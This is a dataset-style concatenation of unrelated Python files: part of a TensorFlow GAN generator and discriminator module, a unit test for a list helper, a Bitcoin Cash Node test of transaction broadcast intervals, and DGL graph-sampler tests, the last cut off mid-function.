conv_bn_lrelu = partial(conv, normalizer_fn=bn, activation_fn=lrelu)
with tf.variable_scope('Genc', reuse=tf.AUTO_REUSE):
h, w = x.shape[1:3]
z = x
zs = []
for i in range(n_layers):
d = min(dim * 2**i, MAX_DIM)
if multi_inputs > i and i > 0:
z = tf.concat([z, tf.image.resize_bicubic(x, (h//(2**i), w//(2**i)))], 3)
z = conv_bn_lrelu(z, d, 4, 2)
zs.append(z)
return zs
def LSTU(in_data, state, out_channel, is_training=True, kernel_size=3, norm='none', pass_state='lstate'):
if norm == 'bn':
norm_fn = partial(batch_norm, is_training=is_training)
elif norm == 'in':
norm_fn = instance_norm
else:
norm_fn = None
gate = partial(conv, normalizer_fn=norm_fn, activation_fn=sigmoid)
info = partial(conv, normalizer_fn=norm_fn, activation_fn=tanh)
with tf.name_scope('ConvGRUCell'):
state_ = dconv(state, out_channel, 4, 2) # upsample and make `channel` identical to `out_channel`
reset_gate = gate(tf.concat([in_data, state_], axis=3), 1, kernel_size)
update_gate = gate(tf.concat([in_data, state_], axis=3), 1, kernel_size)
new_state = reset_gate * state_
new_info = info(tf.concat([in_data, new_state], axis=3), out_channel, kernel_size)
output = (1-update_gate)*state_ + update_gate*new_info
if pass_state == 'gru':
return output, output
elif pass_state == 'direct':
return output, state_
else: # 'stu'
return output, new_state
# state_hat = dconv(old_state, outdim, 4, 2)
# tmp_concat= _concat(x, state_hat, None)
# channelpool1=tf.concat([tf.reduce_max(tmp_concat,3,True), tf.reduce_mean(tmp_concat,3,True)], axis=3)
# r_channel=conv(channelpool1,1,7,1,normalizer_fn=None,activation_fn=sigmoid)
# new_state = r_channel * state_hat
# tmp_concat= _concat(x, new_state, None)
# hidden_info = conv(tmp_concat,outdim,3,1,normalizer_fn=None,activation_fn=tanh)
# tmp_concat= _concat(x, state_hat, None)
# channelpool2=tf.concat([tf.reduce_max(tmp_concat,3,True), tf.reduce_mean(tmp_concat,3,True)], axis=3)
# z=conv(channelpool2,1,7,1,normalizer_fn=None,activation_fn=sigmoid)
# output =z *hidden_info +(1-z)*state_hat
# return output,new_state
def Gstu(zs, _a, dim=64, n_layers=1, inject_layers=0, is_training=True, kernel_size=3, norm='none', pass_state='stu'):
def _concat(z, z_, _a):
feats = [z]
if z_ is not None:
feats.append(z_)
if _a is not None:
_a = tf.reshape(_a, [-1, 1, 1, tl.shape(_a)[-1]])
_a = tf.tile(_a, [1, tl.shape(z)[1], tl.shape(z)[2], 1])
feats.append(_a)
return tf.concat(feats, axis=3)
with tf.variable_scope('Gstu', reuse=tf.AUTO_REUSE):
zs_ = [zs[-1]]
state = _concat(zs[-1], None, _a)
for i in range(n_layers): # n_layers <= 4
d = min(dim * 2**(n_layers - 1 - i), MAX_DIM)
output = LSTU(zs[n_layers - 1 - i],state,d,is_training=is_training,
kernel_size=kernel_size, norm=norm, pass_state=pass_state)
zs_.insert(0, output[0])
if inject_layers > i:
state = _concat(output[1], None, _a)
else:
state = output[1]
return zs_
def Gdec(zs, _a, dim=64, n_layers=5, shortcut_layers=1, inject_layers=0, is_training=True, one_more_conv=0):
bn = partial(batch_norm, is_training=is_training)
dconv_bn_relu = partial(dconv, normalizer_fn=bn, activation_fn=relu)
shortcut_layers = min(shortcut_layers, n_layers - 1)
inject_layers = min(inject_layers, n_layers - 1)
def _concat(z, z_, _a):
feats = [z]
if z_ is not None:
feats.append(z_)
if _a is not None:
_a = tf.reshape(_a, [-1, 1, 1, tl.shape(_a)[-1]])
_a = tf.tile(_a, [1, tl.shape(z)[1], tl.shape(z)[2], 1])
feats.append(_a)
return tf.concat(feats, axis=3)
with tf.variable_scope('Gdec', reuse=tf.AUTO_REUSE):
z = _concat(zs[-1], None, _a)
for i in range(n_layers):
if i < n_layers - 1:
d = min(dim * 2**(n_layers - 1 - i), MAX_DIM)
z = dconv_bn_relu(z, d, 4, 2)
if shortcut_layers > i:
z = _concat(z, zs[n_layers - 2 - i], None)
if inject_layers > i:
z = _concat(z, None, _a)
else:
if one_more_conv: # add one more conv after the decoder
z = dconv_bn_relu(z, dim//4, 4, 2)
x = tf.nn.tanh(dconv(z, 3, one_more_conv))
else:
x = z = tf.nn.tanh(dconv(z, 3, 4, 2))
return x
def D(x, n_att, dim=64, fc_dim=MAX_DIM, n_layers=5):
conv_in_lrelu = partial(conv, normalizer_fn=instance_norm, activation_fn=lrelu)
with tf.variable_scope('D', reuse=tf.AUTO_REUSE):
y = x
for i in range(n_layers):
d = min(dim * 2**i, MAX_DIM)
y = conv_in_lrelu(y, d, 4, 2)
logit_gan = lrelu(fc(y, fc_dim))
logit_gan = fc(logit_gan, 1)
logit_att = lrelu(fc(y, fc_dim))
logit_att = fc(logit_att, n_att)
return logit_gan, logit_att
def gradient_penalty(f, real, fake=None):
def _interpolate(a, b=None):
with tf.name_scope('interpolate'):
if b is None: # interpolation in DRAGAN
beta = tf.random_uniform(shape=tf.shape(a), minval=0., maxval=1.)
_, variance = tf.nn.moments(a, range(a.shape.ndims))
b = a + 0.5 * tf.sqrt(variance) * beta
shape = [tf.shape(a)[0]] + [1] * (a.shape.ndims - 1)
alpha = tf.random_uniform(shape=shape, minval=0., maxval=1.)
inter = a + alpha * (b - a)
inter.set_shape(a.get_shape().as_list())
return inter
with tf.name_scope('gradient_penalty'):
x = _interpolate(real, fake)
pred = f(x)
if isinstance(pred, tuple):
pred = pred[0]
grad = tf.gradients(pred, x)[0]
norm = tf.norm(slim.flatten(grad), axis=1)
gp = tf.reduce_mean((norm - 1.)**2)
return gp
| 2.109375 | 2 |
slender/tests/list/test_keep_if.py | torokmark/slender | 1 | 6966 | <reponame>torokmark/slender
from unittest import TestCase
from expects import expect, equal, raise_error
from slender import List
class TestKeepIf(TestCase):
def test_keep_if_if_func_is_none(self):
e = List([1, 2, 3, 4, 5])
expect(e.keep_if(None).to_list()).to(equal([1, 2, 3, 4, 5]))
def test_keep_if_if_func_is_valid(self):
e = List([1, 2, 3, 4, 5])
expect(e.keep_if(lambda item: item > 3).to_list()).to(equal([4, 5]))
def test_keep_if_if_func_is_invalid_for_all_items(self):
e = List([1, 2, 3, 4, 5])
expect(e.keep_if(lambda item: item > 6).to_list()).to(equal([]))
def test_keep_if_if_func_is_different(self):
e = List([1, 2, 3, 4])
expect(lambda: e.keep_if('...')).to(raise_error(TypeError))
| 2.6875 | 3 |
test/functional/bchn-txbroadcastinterval.py | 1Crazymoney/bitcoin-cash-node | 1 | 6967 | <filename>test/functional/bchn-txbroadcastinterval.py
#!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Cash Node developers
# Author matricz
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Test that inv messages are sent according to
an exponential distribution with scale -txbroadcastinterval
The outbound interval should be half of the inbound
"""
import time
from test_framework.mininode import P2PInterface, mininode_lock
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import wait_until, connect_nodes, disconnect_nodes
from scipy import stats
class InvReceiver(P2PInterface):
def __init__(self):
super().__init__()
self.invTimes = []
self.invDelays = []
def on_inv(self, message):
timeArrived = time.time()
# If an inv contains more then one transaction, then the number of invs (==samplesize)
# will be non-deterministic. This would be an error.
assert(len(message.inv) == 1)
self.invTimes.append(timeArrived)
if len(self.invTimes) > 1:
timediff = self.invTimes[-1] - self.invTimes[-2]
self.invDelays.append(timediff)
class TxBroadcastIntervalTest(BitcoinTestFramework):
# This test will have a node create a number of transactions and relay them
# to the mininode InvReceivers (one inbound and one outbound)
# according to test parameters.
# A third disconnected node is used only to create signed transactions
# The nodes are configured with "-txbroadcastrate=1" and
# "-excessiveblocksize=2000000" so that they relay at most one tx per inv
# It's convenient, because we can now define the exact number of invs
# (== sample size -1) that we want to send
# This holds true only for interval values <= 500 ms
# The mininode InvReceiver just listens and registers the delays between invs
# and constructs a sample array from these delays
# This sample is tested against a reference exponential distribution
# density with the same parameters with scipy.stats.kstest
# (See https://en.wikipedia.org/wiki/Kolmogorov%E2%80%93Smirnov_test)
# The test is accepted if the delays sample resembles the reference
# distribution -- or, more specifically, if the probability that the
# observed distribution would have occurred as a sampling of the theoretical
# exponential distribution with a probability of at least alpha
# (pvalue > alpha, default 0.001)
# There is one mininode that connects directly to the node that generates transactions.
# This tests the *inbound* connection interval.
# The first node creates an outbound connection to the second node,
# which relays the transactions instantly (-txbroadcastinterval=1)
# to the second mininode, which tests the *outbound* connection interval (= 1/2 of the inbound).
# (but is less reliable for small values of the -txbroadcastinterval)
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument("--interval", dest="interval", type=int, default=500,
help="Set the average send interval in ms")
parser.add_argument("--samplesize", dest="samplesize", type=int, default=100,
help="Set the samplesize (number of inv message delays) for testing")
parser.add_argument("--testoutbound", dest="testoutbound", action="store_true",
help="Set whether to test outbound (along inbound) connection interval")
parser.add_argument("--alpha", dest="alpha", type=float, default="0.001",
help="Set a confidence threshold for the kstest")
def set_test_params(self):
self.scale = self.options.interval / 1000
self.num_nodes = 3
args = [
["-txbroadcastinterval={}".format(self.options.interval),
"-txbroadcastrate=1", "-excessiveblocksize=2000000",
"-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)],
["-txbroadcastinterval=1",
"-txbroadcastrate=1", "-excessiveblocksize=2000000",
"-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)],
["-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)]
]
self.extra_args = args
def setup_network(self):
self.setup_nodes()
connect_nodes(self.nodes[0], self.nodes[1])
connect_nodes(self.nodes[1], self.nodes[2])
# Generate enough coins on the spending nodes
self.nodes[2].generate(20 + 100)
self.sync_all()
# Disconnect node 3 so that it doesn't broadcast the txs it creates
disconnect_nodes(self.nodes[1], self.nodes[2])
self.signedtxs = []
to = self.nodes[2].getnewaddress()
for i in range(self.options.samplesize):
txid = self.nodes[2].sendtoaddress(to, "0.00001", "comment", "comment_to", False, 2)
self.signedtxs.append(self.nodes[2].gettransaction(txid)['hex'])
def run_test(self):
inboundReceiver, outboundReceiver = InvReceiver(), InvReceiver()
self.nodes[0].add_p2p_connection(inboundReceiver)
self.nodes[1].add_p2p_connection(outboundReceiver)
for signextx in self.signedtxs:
self.nodes[0].sendrawtransaction(signextx, True)
wait_until(
lambda: len(inboundReceiver.invTimes) == self.options.samplesize,
lock=mininode_lock,
timeout=self.options.samplesize * self.options.interval / 1000 * 2)
wait_until(
lambda: len(outboundReceiver.invTimes) == self.options.samplesize,
lock=mininode_lock,
timeout=self.options.samplesize * self.options.interval / 1000)
inboundkstestresult = stats.kstest(inboundReceiver.invDelays, stats.expon(scale=self.scale).cdf)
outboundkstestresult = stats.kstest(outboundReceiver.invDelays, stats.expon(scale=self.scale / 2).cdf)
self.log.info("kstestresults for interval {}: inbound {}, outbound {}".format(
self.options.interval,
inboundkstestresult,
outboundkstestresult))
assert(inboundkstestresult.pvalue > self.options.alpha), inboundReceiver.invDelays
if self.options.testoutbound:
assert(outboundkstestresult.pvalue > self.options.alpha), outboundReceiver.invDelays
if __name__ == '__main__':
TxBroadcastIntervalTest().main()
| 2.3125 | 2 |
tests/compute/test_sampler.py | buaaqt/dgl | 1 | 6968 | import backend as F
import numpy as np
import scipy as sp
import dgl
from dgl import utils
import unittest
from numpy.testing import assert_array_equal
np.random.seed(42)
def generate_rand_graph(n):
arr = (sp.sparse.random(n, n, density=0.1, format='coo') != 0).astype(np.int64)
return dgl.DGLGraph(arr, readonly=True)
def test_create_full():
g = generate_rand_graph(100)
full_nf = dgl.contrib.sampling.sampler.create_full_nodeflow(g, 5)
assert full_nf.number_of_nodes() == g.number_of_nodes() * 6
assert full_nf.number_of_edges() == g.number_of_edges() * 5
def test_1neighbor_sampler_all():
g = generate_rand_graph(100)
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for i, subg in enumerate(dgl.contrib.sampling.NeighborSampler(
g, 1, g.number_of_nodes(), neighbor_type='in', num_workers=4)):
seed_ids = subg.layer_parent_nid(-1)
assert len(seed_ids) == 1
src, dst, eid = g.in_edges(seed_ids, form='all')
assert subg.number_of_nodes() == len(src) + 1
assert subg.number_of_edges() == len(src)
assert seed_ids == subg.layer_parent_nid(-1)
child_src, child_dst, child_eid = subg.in_edges(subg.layer_nid(-1), form='all')
assert F.array_equal(child_src, subg.layer_nid(0))
src1 = subg.map_to_parent_nid(child_src)
assert F.array_equal(src1, src)
def is_sorted(arr):
return np.sum(np.sort(arr) == arr, 0) == len(arr)
def verify_subgraph(g, subg, seed_id):
seed_id = F.asnumpy(seed_id)
seeds = F.asnumpy(subg.map_to_parent_nid(subg.layer_nid(-1)))
assert seed_id in seeds
child_seed = F.asnumpy(subg.layer_nid(-1))[seeds == seed_id]
src, dst, eid = g.in_edges(seed_id, form='all')
child_src, child_dst, child_eid = subg.in_edges(child_seed, form='all')
child_src = F.asnumpy(child_src)
# We don't allow duplicate elements in the neighbor list.
assert(len(np.unique(child_src)) == len(child_src))
# The neighbor list also needs to be sorted.
assert(is_sorted(child_src))
# a neighbor in the subgraph must also exist in parent graph.
src = F.asnumpy(src)
for i in subg.map_to_parent_nid(child_src):
assert F.asnumpy(i) in src
def test_1neighbor_sampler():
g = generate_rand_graph(100)
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for subg in dgl.contrib.sampling.NeighborSampler(g, 1, 5, neighbor_type='in',
num_workers=4):
seed_ids = subg.layer_parent_nid(-1)
assert len(seed_ids) == 1
assert subg.number_of_nodes() <= 6
assert subg.number_of_edges() <= 5
verify_subgraph(g, subg, seed_ids)
def test_prefetch_neighbor_sampler():
g = generate_rand_graph(100)
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for subg in dgl.contrib.sampling.NeighborSampler(g, 1, 5, neighbor_type='in',
num_workers=4, prefetch=True):
seed_ids = subg.layer_parent_nid(-1)
assert len(seed_ids) == 1
assert subg.number_of_nodes() <= 6
assert subg.number_of_edges() <= 5
verify_subgraph(g, subg, seed_ids)
def test_10neighbor_sampler_all():
g = generate_rand_graph(100)
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for subg in dgl.contrib.sampling.NeighborSampler(g, 10, g.number_of_nodes(),
neighbor_type='in', num_workers=4):
seed_ids = subg.layer_parent_nid(-1)
assert F.array_equal(seed_ids, subg.map_to_parent_nid(subg.layer_nid(-1)))
src, dst, eid = g.in_edges(seed_ids, form='all')
child_src, child_dst, child_eid = subg.in_edges(subg.layer_nid(-1), form='all')
src1 = subg.map_to_parent_nid(child_src)
assert F.array_equal(src1, src)
def check_10neighbor_sampler(g, seeds):
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for subg in dgl.contrib.sampling.NeighborSampler(g, 10, 5, neighbor_type='in',
num_workers=4, seed_nodes=seeds):
seed_ids = subg.layer_parent_nid(-1)
assert subg.number_of_nodes() <= 6 * len(seed_ids)
assert subg.number_of_edges() <= 5 * len(seed_ids)
for seed_id in seed_ids:
verify_subgraph(g, subg, seed_id)
def test_10neighbor_sampler():
g = generate_rand_graph(100)
check_10neighbor_sampler(g, None)
check_10neighbor_sampler(g, seeds=np.unique(np.random.randint(0, g.number_of_nodes(),
size=int(g.number_of_nodes() / 10))))
def _test_layer_sampler(prefetch=False):
g = generate_rand_graph(100)
nid = g.nodes()
src, dst, eid = g.all_edges(form='all', order='eid')
n_batches = 5
batch_size = 50
seed_batches = [np.sort(np.random.choice(F.asnumpy(nid), batch_size, replace=False))
for i in range(n_batches)]
seed_nodes = np.hstack(seed_batches)
layer_sizes = [50] * 3
LayerSampler = getattr(dgl.contrib.sampling, 'LayerSampler')
sampler = LayerSampler(g, batch_size, layer_sizes, 'in',
seed_nodes=seed_nodes, num_workers=4, prefetch=prefetch)
for sub_g in sampler:
assert all(sub_g.layer_size(i) < size for i, size in enumerate(layer_sizes))
sub_nid = F.arange(0, sub_g.number_of_nodes())
assert all(np.all(np.isin(F.asnumpy(sub_g.layer_nid(i)), F.asnumpy(sub_nid)))
for i in range(sub_g.num_layers))
assert np.all(np.isin(F.asnumpy(sub_g.map_to_parent_nid(sub_nid)),
F.asnumpy(nid)))
sub_eid = F.arange(0, sub_g.number_of_edges())
assert np.all(np.isin(F.asnumpy(sub_g.map_to_parent_eid(sub_eid)),
F.asnumpy(eid)))
assert any(np.all(np.sort(F.asnumpy(sub_g.layer_parent_nid(-1))) == seed_batch)
for seed_batch in seed_batches)
sub_src, sub_dst = sub_g.all_edges(order='eid')
for i in range(sub_g.num_blocks):
block_eid = sub_g.block_eid(i)
block_src = sub_g.map_to_parent_nid(F.gather_row(sub_src, block_eid))
block_dst = sub_g.map_to_parent_nid(F.gather_row(sub_dst, block_eid))
block_parent_eid = sub_g.block_parent_eid(i)
block_parent_src = F.gather_row(src, block_parent_eid)
block_parent_dst = F.gather_row(dst, block_parent_eid)
assert np.all(F.asnumpy(block_src == block_parent_src))
n_layers = sub_g.num_layers
sub_n = sub_g.number_of_nodes()
assert sum(F.shape(sub_g.layer_nid(i))[0] for i in range(n_layers)) == sub_n
n_blocks = sub_g.num_blocks
sub_m = sub_g.number_of_edges()
assert sum(F.shape(sub_g.block_eid(i))[0] for i in range(n_blocks)) == sub_m
def test_layer_sampler():
_test_layer_sampler()
_test_layer_sampler(prefetch=True)
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="Error occured when multiprocessing")
def test_nonuniform_neighbor_sampler():
# Construct a graph with
# (1) A path (0, 1, ..., 99) with weight 1
# (2) A bunch of random edges with weight 0.
edges = []
for i in range(99):
edges.append((i, i + 1))
for i in range(1000):
edge = (np.random.randint(100), np.random.randint(100))
if edge not in edges:
edges.append(edge)
src, dst = zip(*edges)
g = dgl.DGLGraph()
g.add_nodes(100)
g.add_edges(src, dst)
g.readonly()
g.edata['w'] = F.cat([
F.ones((99,), F.float64, F.cpu()),
F.zeros((len(edges) - 99,), F.float64, F.cpu())], 0)
# Test 1-neighbor NodeFlow with 99 as target node.
# The generated NodeFlow should only contain node i on layer i.
sampler = dgl.contrib.sampling.NeighborSampler(
g, 1, 1, 99, 'in', transition_prob='w', seed_nodes=[99])
nf = next(iter(sampler))
assert nf.num_layers == 100
for i in range(nf.num_layers):
assert nf.layer_size(i) == 1
assert F.asnumpy(nf.layer_parent_nid(i)[0]) == i
# Test the reverse direction
sampler = dgl.contrib.sampling.NeighborSampler(
g, 1, 1, 99, 'out', transition_prob='w', seed_nodes=[0])
nf = next(iter(sampler))
assert nf.num_layers == 100
for i in range(nf.num_layers):
assert nf.layer_size(i) == 1
assert F.asnumpy(nf.layer_parent_nid(i)[0]) == 99 - i
def test_setseed():
g = generate_rand_graph(100)
nids = []
dgl.random.seed(42)
for subg in dgl.contrib.sampling.NeighborSampler(
g, 5, 3, num_hops=2, neighbor_type='in', num_workers=1):
nids.append(
tuple(tuple(F.asnumpy(subg.layer_parent_nid(i))) for i in range(3)))
# reinitialize
dgl.random.seed(42)
for i, subg in enumerate(dgl.contrib.sampling.NeighborSampler(
g, 5, 3, num_hops=2, neighbor_type='in', num_workers=1)):
item = tuple(tuple(F.asnumpy(subg.layer_parent_nid(i))) for i in range(3))
assert item == nids[i]
for i, subg in enumerate(dgl.contrib.sampling.NeighborSampler(
g, 5, 3, num_hops=2, neighbor_type='in', num_workers=4)):
pass
def check_head_tail(g):
lsrc, ldst, leid = g.all_edges(form='all', order='eid')
lsrc = np.unique(F.asnumpy(lsrc))
head_nid = np.unique(F.asnumpy(g.head_nid))
assert len(head_nid) == len(g.head_nid)
np.testing.assert_equal(lsrc, head_nid)
ldst = np.unique(F.asnumpy(ldst))
tail_nid = np.unique(F.asnumpy(g.tail_nid))
assert len(tail_nid) == len(g.tail_nid)
np.testing.assert_equal(tail_nid, ldst)
def check_negative_sampler(mode, exclude_positive, neg_size):
g = generate_rand_graph(100)
num_edges = g.number_of_edges()
etype = np.random.randint(0, 10, size=g.number_of_edges(), dtype=np.int64)
g.edata['etype'] = F.copy_to(F.tensor(etype), F.cpu())
pos_gsrc, pos_gdst, pos_geid = g.all_edges(form='all', order='eid')
pos_map = {}
for i in range(len(pos_geid)):
pos_d = int(F.asnumpy(pos_gdst[i]))
pos_e = int(F.asnumpy(pos_geid[i]))
pos_map[(pos_d, pos_e)] = int(F.asnumpy(pos_gsrc[i]))
EdgeSampler = getattr(dgl.contrib.sampling, 'EdgeSampler')
# Test the homogeneous graph.
batch_size = 50
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
negative_mode=mode,
reset=False,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
pos_lsrc, pos_ldst, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert_array_equal(F.asnumpy(F.gather_row(pos_edges.parent_eid, pos_leid)),
F.asnumpy(g.edge_ids(F.gather_row(pos_edges.parent_nid, pos_lsrc),
F.gather_row(pos_edges.parent_nid, pos_ldst))))
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
for i in range(len(neg_eid)):
neg_d = int(F.asnumpy(neg_dst)[i])
neg_e = int(F.asnumpy(neg_eid)[i])
assert (neg_d, neg_e) in pos_map
if exclude_positive:
assert int(F.asnumpy(neg_src[i])) != pos_map[(neg_d, neg_e)]
check_head_tail(neg_edges)
pos_tails = F.gather_row(pos_edges.parent_nid, pos_edges.tail_nid)
neg_tails = F.gather_row(neg_edges.parent_nid, neg_edges.tail_nid)
pos_tails = np.sort(F.asnumpy(pos_tails))
neg_tails = np.sort(F.asnumpy(neg_tails))
np.testing.assert_equal(pos_tails, neg_tails)
exist = neg_edges.edata['false_neg']
if exclude_positive:
assert np.sum(F.asnumpy(exist) == 0) == len(exist)
else:
assert F.array_equal(g.has_edges_between(neg_src, neg_dst), exist)
total_samples += batch_size
assert total_samples <= num_edges
# check replacement = True
# with reset = False (default setting)
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
reset=False,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
assert total_samples == num_edges
# check replacement = False
# with reset = False (default setting)
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=False,
reset=False,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
assert total_samples == num_edges
# check replacement = True
# with reset = True
total_samples = 0
max_samples = 2 * num_edges
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
reset=True,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) <= batch_size
total_samples += len(pos_leid)
if (total_samples >= max_samples):
break
assert total_samples >= max_samples
# check replacement = False
# with reset = True
total_samples = 0
max_samples = 2 * num_edges
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=False,
reset=True,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) <= batch_size
total_samples += len(pos_leid)
if (total_samples >= max_samples):
break
assert total_samples >= max_samples
# Test the knowledge graph.
total_samples = 0
for _, neg_edges in EdgeSampler(g, batch_size,
negative_mode=mode,
reset=False,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
exists = neg_edges.edata['false_neg']
neg_edges.edata['etype'] = F.gather_row(g.edata['etype'], neg_eid)
for i in range(len(neg_eid)):
u, v = F.asnumpy(neg_src[i]), F.asnumpy(neg_dst[i])
if g.has_edge_between(u, v):
eid = g.edge_id(u, v)
etype = g.edata['etype'][eid]
exist = neg_edges.edata['etype'][i] == etype
assert F.asnumpy(exists[i]) == F.asnumpy(exist)
total_samples += batch_size
assert total_samples <= num_edges
def check_weighted_negative_sampler(mode, exclude_positive, neg_size):
g = generate_rand_graph(100)
num_edges = g.number_of_edges()
num_nodes = g.number_of_nodes()
edge_weight = F.copy_to(F.tensor(np.full((num_edges,), 1, dtype=np.float32)), F.cpu())
node_weight = F.copy_to(F.tensor(np.full((num_nodes,), 1, dtype=np.float32)), F.cpu())
etype = np.random.randint(0, 10, size=num_edges, dtype=np.int64)
g.edata['etype'] = F.copy_to(F.tensor(etype), F.cpu())
pos_gsrc, pos_gdst, pos_geid = g.all_edges(form='all', order='eid')
pos_map = {}
for i in range(len(pos_geid)):
pos_d = int(F.asnumpy(pos_gdst[i]))
pos_e = int(F.asnumpy(pos_geid[i]))
pos_map[(pos_d, pos_e)] = int(F.asnumpy(pos_gsrc[i]))
EdgeSampler = getattr(dgl.contrib.sampling, 'EdgeSampler')
# Correctness check
# Test the homogeneous graph.
batch_size = 50
# Test the knowledge graph with edge weight provied.
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
reset=False,
edge_weight=edge_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
pos_lsrc, pos_ldst, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert_array_equal(F.asnumpy(F.gather_row(pos_edges.parent_eid, pos_leid)),
F.asnumpy(g.edge_ids(F.gather_row(pos_edges.parent_nid, pos_lsrc),
F.gather_row(pos_edges.parent_nid, pos_ldst))))
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
for i in range(len(neg_eid)):
neg_d = int(F.asnumpy(neg_dst[i]))
neg_e = int(F.asnumpy(neg_eid[i]))
assert (neg_d, neg_e) in pos_map
if exclude_positive:
assert int(F.asnumpy(neg_src[i])) != pos_map[(neg_d, neg_e)]
check_head_tail(neg_edges)
pos_tails = F.gather_row(pos_edges.parent_nid, pos_edges.tail_nid)
neg_tails = F.gather_row(neg_edges.parent_nid, neg_edges.tail_nid)
pos_tails = np.sort(F.asnumpy(pos_tails))
neg_tails = np.sort(F.asnumpy(neg_tails))
np.testing.assert_equal(pos_tails, neg_tails)
exist = neg_edges.edata['false_neg']
if exclude_positive:
assert np.sum(F.asnumpy(exist) == 0) == len(exist)
else:
assert F.array_equal(g.has_edges_between(neg_src, neg_dst), exist)
total_samples += batch_size
assert total_samples <= num_edges
# Test the knowledge graph with edge weight provied.
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
reset=False,
edge_weight=edge_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
exists = neg_edges.edata['false_neg']
neg_edges.edata['etype'] = F.gather_row(g.edata['etype'], neg_eid)
for i in range(len(neg_eid)):
u, v = F.asnumpy(neg_src[i]), F.asnumpy(neg_dst[i])
if g.has_edge_between(u, v):
eid = g.edge_id(u, v)
etype = g.edata['etype'][eid]
exist = neg_edges.edata['etype'][i] == etype
assert F.asnumpy(exists[i]) == F.asnumpy(exist)
total_samples += batch_size
assert total_samples <= num_edges
# Test the knowledge graph with edge/node weight provied.
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
reset=False,
edge_weight=edge_weight,
node_weight=node_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
exists = neg_edges.edata['false_neg']
neg_edges.edata['etype'] = F.gather_row(g.edata['etype'], neg_eid)
for i in range(len(neg_eid)):
u, v = F.asnumpy(neg_src[i]), F.asnumpy(neg_dst[i])
if g.has_edge_between(u, v):
eid = g.edge_id(u, v)
etype = g.edata['etype'][eid]
exist = neg_edges.edata['etype'][i] == etype
assert F.asnumpy(exists[i]) == F.asnumpy(exist)
total_samples += batch_size
assert total_samples <= num_edges
# check replacement = True with pos edges no-uniform sample
# with reset = False
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
reset=False,
edge_weight=edge_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
assert total_samples == num_edges
# check replacement = True with pos edges no-uniform sample
# with reset = True
total_samples = 0
